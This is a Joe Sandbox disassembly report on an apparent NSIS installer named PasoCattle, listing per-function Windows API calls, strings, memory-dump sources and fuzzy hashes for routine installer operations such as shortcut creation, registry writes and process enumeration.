API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,74DF23A0,00000000), ref: 00406A73

Strings

F, xrefs: 00406A7F
F, xrefs: 00406858
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

EnumProcessModules, xrefs: 004064B6
Unknown, xrefs: 00406528
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
Kernel32.DLL, xrefs: 004065C7
Module32NextW, xrefs: 0040660A
Module32FirstW, xrefs: 004065FF
EnumProcesses, xrefs: 004064AE
PSAPI.DLL, xrefs: 00406490
GetModuleBaseNameW, xrefs: 004064C0
Process32NextW, xrefs: 004065F4

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
N, xrefs: 00404298
F, xrefs: 004042D3

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

plF, xrefs: 00406B54
^F, xrefs: 00406ACF
NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69

Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004061C1, 004061C6, 004061CD, 004061DC
@bG, xrefs: 00406162

Memory Dump Source

Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: @bG$RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-3206598305
Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
